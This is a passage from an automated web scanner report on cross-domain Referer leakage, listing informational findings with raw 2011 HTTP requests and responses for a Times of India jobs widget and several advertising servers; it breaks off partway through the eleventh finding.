class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">1M</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"190a28f9",fb_dtsg:"AQD3-NrH",no_cookies:1,lhsh:"3AQBYepcy"};
</script>
<script>



onloadRegister(function (){Bootloader.done([])});
onloadRegister(function (){(function() { new ExternalPageLikeWidget({"viewer":0,"channelURL":"","nodeType":"link","externalURL":"http:\/\/www.facebook.com\/TimesofIndia","pageId":null,"widgetID":"connect_widget_4e62e3997f5327689927259","alreadyConnected":false,"viewerIsAdmin":false,"adminUrl":"","showFaces":false,"useUnlikeLink":false,"layout":"button_count","locale":"en_US","commentWidgetMarkup":"","error":null,"autoResize":true,"connectText":0,"socia
...[SNIP]...

21. Cross-domain Referer leakage  previous  next
There are 115 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


21.1. http://223.165.24.159/toiwidget/jsp/widget.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://223.165.24.159
Path:   /toiwidget/jsp/widget.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /toiwidget/jsp/widget.jsp?city=Mumbai HTTP/1.1
Host: 223.165.24.159
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:36:05 GMT
Server: Apache/2.2.16 (Unix) DAV/2 PHP/5.2.14 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP01 (build: SVNTag=JBPAPP_4_3_0_GA_CP01 date=200804211746)/Tomcat-5.5
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 13603


    <link href="../css/style.css" rel="stylesheet" type="text/css" /><div class="box">    <h2>        <div class="fl" id="cityId"></div>                <div class="fr" style="width:85px; text-align:right; margin-top:4px;" id="tjimage">            <a href="http://www.timesjobs.com" target="_blank">                <img src="../images/tj.gif" border="0" title="Jobs in India - TimesJobs.com" align="top"/>
...[SNIP]...
<li>                        <a href="http://www.timesjobs.com/job-detail/HR-PM-IR-Training-job-in-Link-InTime-Mumbai-jobid-ocMJiQoy4wZzpSvf+uAgZw==-loc-198305" target="_blank" title="Head HR">Head HR</a>
...[SNIP]...
<li>                        <a href="http://www.timesjobs.com/job-detail/Sales-Business-Development-job-in-Vridhi-HR-Solutions-Division-of-vridhi-group-Pune-jobid-5BpMA+OiZ9RzpSvf+uAgZw==-loc-198305" target="_blank" title="Manager/RSM-West-Mumbai/Pune">Manager/RSM-Wes...</a>
...[SNIP]...
</style><link href="http://www.magicbricks.com/css/TOI.css.pagespeed.cf.Xl_zB1n0xP.css" rel="stylesheet" type="text/css"><script type="text/javascript">
...[SNIP]...
<li><a target="_blank" href="http://www.magicbricks.com/bricks/viewProperty.html?id=lnCaKMh98Ug=">     3Bedroom, Residential House </a>
...[SNIP]...
<li><a target="_blank" href="http://www.magicbricks.com/bricks/viewProperty.html?id=jIh6FH9sWlI=">     1Bedroom, Multistorey Apartment </a>
...[SNIP]...
<td height="90" valign="center" align="center"><a target="_blank" href="http://www.simplymarry.com/timesmatri/faces/jsp/profileDisplay.jsp?profileId=mumf930793&sc=TOI">            <img src="http://www.simplymarry.com/timesmatri/faces/jsp/searchResult.photo?profId=mumf930793" width="49" height="72" style="border:1px solid #333333;" /></a>
...[SNIP]...
<strong style="color:#054e9b;"><a style="color:#004799; text-decoration:none;" target="_blank" title="" href="http://www.simplymarry.com/timesmatri/faces/jsp/profileDisplay.jsp?profileId=mumf930793&sc=TOI">Hindu Nair</a>
...[SNIP]...
<div align="right"><a target="_blank" href="http://www.simplymarry.com/timesmatri/faces/jsp/index.jsp?looking=F&sc=TOI" style="font-size:11px; color:#054e9b;">More alliances &raquo;</a>
...[SNIP]...
<td height="90" valign="center" align="center"><a target="_blank" href="http://www.simplymarry.com/timesmatri/faces/jsp/profileDisplay.jsp?profileId=mumm293731&sc=TOI">            <img src="http://www.simplymarry.com/timesmatri/faces/jsp/searchResult.photo?profId=mumm293731" width="49" height="72" style="border:1px solid #333333;" /></a>
...[SNIP]...
<strong style="color:#054e9b;"><a style="color:#004799; text-decoration:none;" target="_blank" title="" href="http://www.simplymarry.com/timesmatri/faces/jsp/profileDisplay.jsp?profileId=mumm293731&sc=TOI">Hindu Maratha</a>
...[SNIP]...
<div align="right"><a target="_blank" href="http://www.simplymarry.com/timesmatri/faces/jsp/index.jsp?looking=M&sc=TOI" style="font-size:11px; color:#054e9b;">More alliances &raquo;</a>
...[SNIP]...

21.2. http://a1.interclick.com/CookieCheck.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a1.interclick.com
Path:   /CookieCheck.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /CookieCheck.aspx?optOut=http%3a%2f%2fwww.networkadvertising.org%2fverify%2fcookie_optout.gif&hasCookies=http%3a%2f%2fwww.networkadvertising.org%2fverify%2fcookie_exists.gif&nocookies=http%3a%2f%2fwww.networkadvertising.org%2fverify%2fno_cookie.gif&nocache=0.2534776 HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=ef156cf5-d9a2-4704-9dc3-362f08c1bcb4; sgm=12290=734380

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 175
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://www.networkadvertising.org/verify/cookie_exists.gif
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sun, 04 Sep 2011 10:59:18 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.networkadvertising.org/verify/cookie_exists.gif">here</a>.</h2>
</body></html>

21.3. http://a1.interclick.com/optOut.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a1.interclick.com
Path:   /optOut.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /optOut.aspx?optOut=verify&success=http%3a%2f%2fwww.networkadvertising.org%2foptout%2fopt_success.gif&fail=http%3a%2f%2fwww.networkadvertising.org%2foptout%2fopt_failure.gif HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Opt=out

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 173
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://www.networkadvertising.org/optout/opt_failure.gif
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sun, 04 Sep 2011 11:16:31 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.networkadvertising.org/optout/opt_failure.gif">here</a>.</h2>
</body></html>

21.4. http://ad-apac.doubleclick.net/adi/N5840.139243.NATIONMULTIMEDIA.CO/B4833719.2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad-apac.doubleclick.net
Path:   /adi/N5840.139243.NATIONMULTIMEDIA.CO/B4833719.2

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N5840.139243.NATIONMULTIMEDIA.CO/B4833719.2;sz=300x250;ord=[timestamp]? HTTP/1.1
Host: ad-apac.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/banner/index_b5.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5496
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 04 Sep 2011 02:27:14 GMT
Expires: Sun, 04 Sep 2011 02:27:14 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Tue Sep 14 05:50:44 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
B0-0%3B0%3B53077025%3B4307-300/250%3B38385063/38402820/1%3B%3B%7Esscs%3D%3fhttp://h20426.www2.hp.com/campaign/laserjet/th/th/index.html?jumpid=ex_r4176_th/en/smb/ipg/nationmultimedia_300x250/laserjet"><img src="http://s0.2mdn.net/2482029/6-300x250.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

21.5. http://ad.doubleclick.net/adi/N6296.126265.CASALE/B5641720.250  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6296.126265.CASALE/B5641720.250

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N6296.126265.CASALE/B5641720.250;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88918/;ord=458952158 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/88918/233260/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5815
Date: Sun, 04 Sep 2011 02:25:47 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Thu Aug 25 10:49:22 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
1%3B2-0%3B0%3B68132397%3B3454-728/90%3B43712202/43729989/1%3B%3B%7Esscs%3D%3fhttp://c.casalemedia.com/c/2/1/88918/http://enciendetefios.com/en/?CMP=BAC-MXT_D_Q1_F3_H_Q_Y_X12%5b%5bHASH%5d%5dbundle-032"><img src="http://s0.2mdn.net/3257730/FiOS_MZ2_2011_ACQ_Popcorn_English_728x90_lc.jpg" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a></noscript>
<script type='text/javascript' language='javascript' src='http://cdn.doubleverify.com/script145.js?agnc=741233&cmp=5641720&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=68132397&advid=3257730&sid=953446&adid=&btreg=DCF242908621&btsvrreg=doubleclick'></script>
...[SNIP]...

21.6. http://ad.doubleclick.net/adi/N6296.126265.CASALE/B5641720.306  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6296.126265.CASALE/B5641720.306

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N6296.126265.CASALE/B5641720.306;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88958/;ord=589625147 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/88958/233224/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5996
Date: Sun, 04 Sep 2011 02:27:22 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Tue Aug 16 09:52:51 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
93839/1%3B%3B%7Esscs%3D%3fhttp://c.casalemedia.com/c/2/1/88958/http://www22.verizon.com/Residential/Bundles/MarketingLanding/triple_play_btr/triple_play_btr?hsitype=hsi12&CMP=BAC-MXT_D_Q1_C3_H_Q_N_X7"><img src="http://s0.2mdn.net/3257730/CHSI_2011_MZ3_NFLSunday_Mass_English_728x90_extended.jpg" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a></noscript>

<script type='text/javascript' language='javascript' src='http://cdn.doubleverify.com/script145.js?agnc=741233&cmp=5641720&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=68132545&advid=3257730&sid=953446&adid=&btreg=DCF242905086&btsvrreg=doubleclick'></script>
...[SNIP]...

21.7. http://ad.yieldmanager.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pixel?&id=1364633&id=698998&id=1416226&id=1282674&id=1361950&id=1198834&id=1342492&id=1198835&id=1239839&id=939893&id=1415533&id=1224511&id=1415271&id=1364793&id=1188217&id=1294447&id=1253950&id=1187608&id=950991&id=1283938&id=956405&id=1349763&id=1357445&id=1398249&id=1320775&id=1023063&id=1050626&id=1416227&id=1210932&id=1415270&id=956404&id=1250690&t=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; bh="b!!!!w!!-O3!!!!#=3G@^!!Os7!!!!#=3G@^!!`4x!!!!$=3Ef#!!jBx!!!!#=2srH!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!#=3GDg!#0Db!!!!#=3*$x!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#N[5!!!!#=3!ea!#Q*T!!!!#=3GDg!#RY.!!!!#=3GDg!#SCj!!!!#=3GDg!#SCk!!!!#=3GDg!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!#=3GDg!#aG>!!!!#=3GDg!#bw^!!!!#=3G@^!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!#=3GDg!#tK$!!!!#=3GDg!#ust!!!!#=3GDg!#usu!!!!#=3GDg!#v-#!!!!#=3*$x!#wW9!!!!#=3GDg!#yM#!!!!#=3GDg!$#WA!!!!#=3GDg!$%,!!!!!#=3GDg!$%SB!!!!#=3GDg!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*Q<!!!!#=3GDg!$*a0!!!!#=3GDg!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$,0h!!!!#=3GDg!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!#=3GDg!$1:.!!!!#=3!ea!$2j$!!!!#=3GDg!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!#=3GDg!$3y-!!!!'=2v<]!$4ou!!!!#=3GDg!$5Nu!!!!#=3GDg!$5oO!!!!#=3GDg!$5qE!!!!#=3GDg!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!#=3GDg!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!#=3GDg!$=p8!!!!#=3GDg!$>#M!!!!#=3GDg!$>#N!!!!#=3GDg"

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:40:50 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: bh="b!!!!x!!-O3!!!!#=3G@^!!Os7!!!!#=3G@^!!`4x!!!!$=3Ef#!!jBx!!!!#=2srH!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!$=3H?B!#0Db!!!!#=3*$x!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#N[5!!!!#=3!ea!#Q*T!!!!$=3H?B!#RY.!!!!$=3H?B!#SCj!!!!$=3H?B!#SCk!!!!$=3H?B!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!$=3H?B!#aG>!!!!$=3H?B!#bw^!!!!#=3G@^!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!$=3H?B!#tK$!!!!$=3H?B!#ust!!!!$=3H?B!#usu!!!!$=3H?B!#v-#!!!!#=3*$x!#wW9!!!!$=3H?B!#yM#!!!!$=3H?B!$#WA!!!!$=3H?B!$%,!!!!!$=3H?B!$%SB!!!!$=3H?B!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*Q<!!!!$=3H?B!$*a0!!!!$=3H?B!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$,0h!!!!$=3H?B!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!$=3H?B!$1:.!!!!#=3!ea!$2j$!!!!$=3H?B!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!$=3H?B!$3y-!!!!'=2v<]!$4ou!!!!$=3H?B!$5Nu!!!!$=3H?B!$5oO!!!!$=3H?B!$5qE!!!!$=3H?B!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!$=3H?B!$<DI!!!!#=3G@^!$=p7!!!!$=3H?B!$=p8!!!!$=3H?B!$=s@!!!!#=3H?B!$>#M!!!!$=3H?B!$>#N!!!!$=3H?B!$>E(!!!!U=3H=w"; path=/; expires=Tue, 03-Sep-2013 02:40:50 GMT
Set-Cookie: BX=8d7n6ot73ufk2&b=4&s=8m&t=219; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Sun, 04 Sep 2011 02:40:50 GMT
Pragma: no-cache
Content-Length: 660
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1033191019/?label=5n2yCJ3M-wEQ6_zU7AM&amp;guid=ON&amp;script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=SETJCLC0lAIQjPe59AM&amp;guid=ON&amp;script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=3CLYCPCM3AEQjPe59AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=SWqcCPC66QEQjPe59AM&amp;guid=ON&amp;script=0" />');

21.8. http://ads.bluelithium.com/st  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /st?ad_type=iframe&ad_size=1x1&section=2377409 HTTP/1.1
Host: ads.bluelithium.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=767

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:36:27 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sun, 04 Sep 2011 02:36:27 GMT
Pragma: no-cache
Content-Length: 4577
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
</noscript><img src="http://content.yieldmanager.com/ak/q.gif" style="display:none" width="1" height="1" border="0" alt="" /></body>
...[SNIP]...

21.9. http://ads.reach360ads.com/www/ads/iframe.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.reach360ads.com
Path:   /www/ads/iframe.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /www/ads/iframe.php?zoneid=1254&cb=INSERT_RANDOM_NUMBER_HERE&ct0=INSERT_CLICKURL_HERE HTTP/1.1
Host: ads.reach360ads.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:34:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: _OXLIA[1858]=deleted; expires=Sat, 04-Sep-2010 02:34:34 GMT; path=/
Set-Cookie: %5FOXLIA%5B1858%5D=deleted; expires=Sat, 04-Sep-2010 02:34:34 GMT; path=/
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=7202eec1614b307b4ef4ca8cc06d6074; expires=Mon, 03-Sep-2012 02:34:35 GMT; path=/
Set-Cookie: OXLIA=1858.lqz82s-1254; expires=Mon, 03-Sep-2012 02:34:35 GMT; path=/
Content-Length: 2141
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<div id="batra"><a href="http://www.drbatras.com/campaigns/reach360/hairloss/" target="_blank"><img src="http://ads.reach360ads.com/www/images/batra.gif" alt="DrBatra" border="0"/>
...[SNIP]...

21.10. http://adserver.adtechus.com/addyn/3.0/5132/1305477/0/170/ADTECH  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5132/1305477/0/170/ADTECH

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /addyn/3.0/5132/1305477/0/170/ADTECH;loc=100;target=_blank;sub1=javascript;sub2=noauto;misc=0.02706600772216916;misc=1315103192573;rdclick=http://yads.zedo.com/ads2/c%3Fa=789954%3Bn=767%3Bx=2304%3Bc=767000004,767000004%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=0%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=k5xiThcyanucBq9IXvhSGSz5~090311%3Bsn=767%3Bsc=0%3Bss=0%3Bsi=0%3Bse=1%3Bk= HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4E5FAC086E651A4418BD90FFF001676A

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 503

document.write('<a href="http://yads.zedo.com/ads2/c%3Fa=789954%3Bn=767%3Bx=2304%3Bc=767000004,767000004%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=0%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=k5xiThcyanucBq9IXvhSGSz5~090311%3Bsn=767%3Bsc=0%3Bss=0%3Bsi=0%3Bse=1%3Bk=http://adserver.adtechus.com/?adlink/5132/1305477/0/170/AdId=-3;BnId=0;itime=104221413;sub1=javascript;sub2=noauto;" target=_blank><img src="http://aka-cdn-ns.adtechus.com/images/AT170_300x250_4.gif" border=0 alt="AdTech Ad" width="300" height="250">
...[SNIP]...

21.11. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top

Issue detail

